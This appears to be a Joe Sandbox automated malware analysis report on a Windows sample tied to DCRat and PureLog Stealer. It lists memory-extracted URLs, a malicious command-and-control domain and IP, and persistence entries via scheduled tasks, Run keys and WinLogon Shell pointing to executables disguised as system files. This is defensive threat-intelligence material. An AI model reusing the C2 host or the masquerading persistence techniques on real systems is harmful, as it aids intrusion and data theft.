00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://321723cm.rePrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://321723cm.renyash.rurCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.0000000003C03000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.carterandcone.comlrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.sajatypeworks.comrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.typography.netDrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/cabarga.htmlNrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cn/cTherCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/staff/dennis.htmrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.founder.com.cn/cnrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.com/designers/frere-user.htmlrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.jiyu-kobo.co.jp/rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.galapagosdesign.com/DPleaserCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.fontbureau.com/designers8rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.fonts.comrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.sandoll.co.krrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.urwpp.deDPleaserCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://321723cm.rePbrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.zhongyicts.com.cnrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namer6cRyCpdfS.exe, 00000000.00000002.1746716592.0000000003482000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sakkal.comrCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.3053337355.000000001FF12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000137C2000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014229000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014B46000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F04000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014156000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013B2A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014D48000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013E33000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001447B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013D9B000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.00000000147E9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001372A000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014719000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014104000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014513000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014BDE000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013F9C000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014A76000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000013A92000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.0000000014EA9000.00000004.00000800.00020000.00000000.sdmp, rCdgcwByUDmMcQzYkDZywyWr.exe, 00000022.00000002.2969409889.000000001406C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      37.44.238.250
                                                                                                      		321723cm.renyash.ruFrance
                                                                                                      		49434HARMONYHOSTING-ASFRtrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1581086
                                                                                                      Start date and time:2024-12-26 22:31:07 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 10m 41s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:44
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:r6cRyCpdfS.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:6310493F1EAE60F8F1375EB05341A7D7.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.spre.troj.spyw.expl.evad.winEXE@45/306@1/1
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 7.1%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target WmiPrvSE.exe, PID 8008 because it is empty
                                                                                                      • Execution Graph export aborted for target WmiPrvSE.exe, PID 8100 because it is empty
                                                                                                      • Execution Graph export aborted for target WmiPrvSE.exe, PID 8108 because it is empty
                                                                                                      • Execution Graph export aborted for target r6cRyCpdfS.exe, PID 5000 because it is empty
                                                                                                      • Execution Graph export aborted for target r6cRyCpdfS.exe, PID 7268 because it is empty
                                                                                                      • Execution Graph export aborted for target r6cRyCpdfS.exe, PID 7940 because it is empty
                                                                                                      • Execution Graph export aborted for target r6cRyCpdfS.exe, PID 7988 because it is empty
                                                                                                      • Execution Graph export aborted for target rCdgcwByUDmMcQzYkDZywyWr.exe, PID 7684 because it is empty
                                                                                                      • Execution Graph export aborted for target rCdgcwByUDmMcQzYkDZywyWr.exe, PID 8020 because it is empty
                                                                                                      • Execution Graph export aborted for target rCdgcwByUDmMcQzYkDZywyWr.exe, PID 8040 because it is empty
                                                                                                      • Execution Graph export aborted for target smartscreen.exe, PID 7376 because it is empty
                                                                                                      • Execution Graph export aborted for target smartscreen.exe, PID 8076 because it is empty
                                                                                                      • Execution Graph export aborted for target smartscreen.exe, PID 8084 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: r6cRyCpdfS.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      16:32:17API Interceptor354315x Sleep call for process: rCdgcwByUDmMcQzYkDZywyWr.exe modified
                                                                                                      21:32:04Task SchedulerRun new task: r6cRyCpdfS path: "C:\Users\user\Desktop\r6cRyCpdfS.exe"
                                                                                                      21:32:04Task SchedulerRun new task: r6cRyCpdfSr path: "C:\Users\user\Desktop\r6cRyCpdfS.exe"
                                                                                                      21:32:04Task SchedulerRun new task: rCdgcwByUDmMcQzYkDZywyWr path: "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                      21:32:04Task SchedulerRun new task: rCdgcwByUDmMcQzYkDZywyWrr path: "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                      21:32:05Task SchedulerRun new task: smartscreen path: "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                      21:32:05Task SchedulerRun new task: smartscreens path: "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                      21:32:05Task SchedulerRun new task: WmiPrvSE path: "C:\Recovery\WmiPrvSE.exe"
                                                                                                      21:32:05Task SchedulerRun new task: WmiPrvSEW path: "C:\Recovery\WmiPrvSE.exe"
                                                                                                      21:32:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                      21:32:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Recovery\WmiPrvSE.exe"
                                                                                                      21:32:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWr "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                      21:32:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run r6cRyCpdfS "C:\Users\user\Desktop\r6cRyCpdfS.exe"
                                                                                                      21:32:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                      21:32:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Recovery\WmiPrvSE.exe"
                                                                                                      21:33:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWr "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                      21:33:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run r6cRyCpdfS "C:\Users\user\Desktop\r6cRyCpdfS.exe"
                                                                                                      21:33:17AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                      21:33:25AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Recovery\WmiPrvSE.exe"
                                                                                                      21:33:34AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run rCdgcwByUDmMcQzYkDZywyWr "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                      21:33:42AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run r6cRyCpdfS "C:\Users\user\Desktop\r6cRyCpdfS.exe"
                                                                                                      21:33:58AutostartRun: WinLogon Shell "C:\Program Files (x86)\jdownloader\smartscreen.exe"
                                                                                                      21:34:06AutostartRun: WinLogon Shell "C:\Recovery\WmiPrvSE.exe"
                                                                                                      21:34:15AutostartRun: WinLogon Shell "C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe"
                                                                                                      21:34:23AutostartRun: WinLogon Shell "C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe"

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      37.44.238.250cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • whware.top/RequestLowGeoLongpollWordpress.php
                                                                                                      vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
                                                                                                      8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 703648cm.renyash.top/provider_cpugame.php
                                                                                                      4si9noTBNw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
                                                                                                      Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                                                                      4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 143840cm.nyashteam.ru/DefaultPublic.php
                                                                                                      s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
                                                                                                      QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 117813cm.n9shteam.in/ExternalRequest.php
                                                                                                      EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                                                                      3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      HARMONYHOSTING-ASFRcbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 37.44.238.250
                                                                                                      vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 37.44.238.250
                                                                                                      dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 37.44.238.94
                                                                                                      dlr.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 37.44.238.94
                                                                                                      dlr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 37.44.238.94
                                                                                                      dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 37.44.238.94
                                                                                                      8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 37.44.238.250
                                                                                                      roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                      • 37.44.238.73
                                                                                                      roze.armv4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                      • 37.44.238.73
                                                                                                      roze.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                      • 37.44.238.73

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      C:\Users\user\Desktop\AaEpKsEu.logtBnELFfQoe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        Z4D3XAZ2jB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            F3ePjP272h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  6G8OR42xrB.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                    XNPOazHpXF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      3e88PGFfkf.exeGet hashmaliciousDCRatBrowse
                                                                                                                        9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\6562cf32ce99ca

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106
                                                                                                                          Entropy (8bit):5.5131265303131185
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:83WHdTDI3duJngc3nDGE7wh1BW4ciigBI4WXg0sW+b:8MTZgcpY1BhcBgBIS0Ab
                                                                                                                          MD5:57925FC9B39729DBA0770687F92BD778
                                                                                                                          SHA1:AA6CE107F89862F9D415DCC5E51686CBDF6A4F8C
                                                                                                                          SHA-256:174AE34BD2534382129A59D92447F7AF653B3B14C626F80CD665EAF664A0EEDD
                                                                                                                          SHA-512:18A1CABAFFB7AA87B6426216FC13FF902F42E67C5AA83C86128838D404EA773D1A22CA20187870D51884EA7B51FFAE58CDA9378E152EC71439CC0EE003C69442
                                                                                                                          Malicious:false
                                                                                                                          Preview:MRqt7h0MQUFc9mNIxvVJSvy3kURdNKN8BEK9uRBf92TXCDHUDxRSsbxbdwJnPW9GGHa4bNYgtzKZca0hM6aZ25PkQsg7IXPm3MR5mM2zZv

                                                                                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
